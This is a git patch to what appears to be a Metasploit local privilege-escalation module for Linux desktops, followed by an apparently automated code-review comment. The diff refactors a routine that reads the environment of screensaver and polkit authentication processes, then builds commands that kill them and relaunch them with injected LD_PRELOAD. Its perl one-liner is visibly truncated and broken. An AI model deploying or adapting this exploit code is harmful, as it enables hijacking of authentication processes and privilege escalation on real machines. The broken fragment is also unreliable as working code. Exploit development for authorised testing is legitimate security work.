From 36ac0e6279a644a1bc862aed68869f5fdc51c67b Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Wed, 24 Dec 2014 14:55:18 -0600
Subject: [PATCH] Clean get_restart_commands

---
 .../local/desktop_privilege_escalation.rb | 25 +++++++++++++++----
 1 file changed, 20 insertions(+), 5 deletions(-)

diff --git a/modules/exploits/linux/local/desktop_privilege_escalation.rb b/modules/exploits/linux/local/desktop_privilege_escalation.rb
index 5b0c32426e..ebff894fd9 100644
--- a/modules/exploits/linux/local/desktop_privilege_escalation.rb
+++ b/modules/exploits/linux/local/desktop_privilege_escalation.rb
@@ -109,29 +109,44 @@ class Metasploit4 < Msf::Exploit::Local
   end
 
   def get_restart_commands
-    text_output = cmd_exec('pidof xscreensaver gnome-screensaver polkit-gnome-authentication-agent-1|perl -ne \'while(/(\d+)/g){$pid=$1;next unless -r "/proc/$pid/environ";print"PID:$pid\nEXE:".readlink("/proc/$pid/exe")."\n";$/=undef;for("cmdline","environ"){open F,"),"\n";}}\'').gsub("\r","")
+    get_cmd_lines = 'pidof xscreensaver gnome-screensaver polkit-gnome-authentication-agent-1|'
+    get_cmd_lines << 'perl -ne \'while(/(\d+)/g){$pid=$1;next unless -r "/proc/$pid/environ";'
+    get_cmd_lines << 'print"PID:$pid\nEXE:".readlink("/proc/$pid/exe")."\n";'
+    get_cmd_lines << '$/=undef;'
+    get_cmd_lines << 'for("cmdline","environ"){open F,"),"\n";}}\''
+
+    text_output = cmd_exec(get_cmd_lines).gsub("\r",'')
     vprint_status(text_output)
+
     lines = text_output.split("\n")
-    process_restart_commands = []
+
+    restart_commands = []
     i=0
-    while(i < lines.length-3)
+    while i < lines.length - 3
       m = lines[i].match(/^PID:(\d+)/)
+
       if m
         pid = m[1]
         vprint_status("PID=#{pid}")
         print_status("Found process: " + lines[i+1])
+
         exe = lines[i+1].match(/^EXE:(\S+)$/)[1]
         vprint_status("exe=#{exe}")
+
         cmdline = [lines[i+2].match(/^cmdline:(\w+)$/)[1]].pack("H*").split("\x00")
         vprint_status("CMDLINE=" + cmdline.join(" XXX "))
+
         env = lines[i+3].match(/^environ:(\w+)$/)[1]
         restart_command = 'perl -e \'use POSIX setsid;open STDIN,"/dev/null";open STDERR,">/dev/null";exit if fork;setsid();kill(9,' + pid + ')||exit;%ENV=();for(split("\0",pack("H*","' + env + '"))){/([^=]+)=(.*)/;$ENV{$1}=$2}$ENV{"LD_PRELOAD"}="LD_PRELOAD_PLACEHOLDER";exec {"' + exe + '"} ' + cmdline.map{|x| '"' + x + '"'}.join(", ") + '\'';
+
         vprint_status("RESTART: #{restart_command}")
-        process_restart_commands.push(restart_command)
+        restart_commands.push(restart_command)
       end
+
       i+=1
     end
-    return process_restart_commands
+
+    restart_commands
   end
 
   def c_code(exe_file)
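Review bot: The new `get_cmd_lines` local is named like a method (verb prefix) and is assembled by `<<` onto a single-quoted literal, which forces the `\'` escapes inside the perl one-liner and would raise FrozenError if the file ever enabled `frozen_string_literal`; a name such as `pidof_cmd` together with a `%q{...}` literal, or an array of fragments joined once, would keep the command text byte-identical without the escaping. The loop that follows still carries no explanation of the `lines.length - 3` bound; the four regexes on `lines[i]` through `lines[i+3]` show that each reported process is a four-line record, so a comment such as `# each process is reported as 4 lines: PID, EXE, cmdline, environ` above `while i < lines.length - 3` would make both the bound and the `i+1..i+3` indexing self-explanatory. The `match(...)[1]` calls on the unchanged context lines raise NoMethodError on a truncated or unexpected record instead of skipping it, which this cleanup leaves as is and which the comment could also flag.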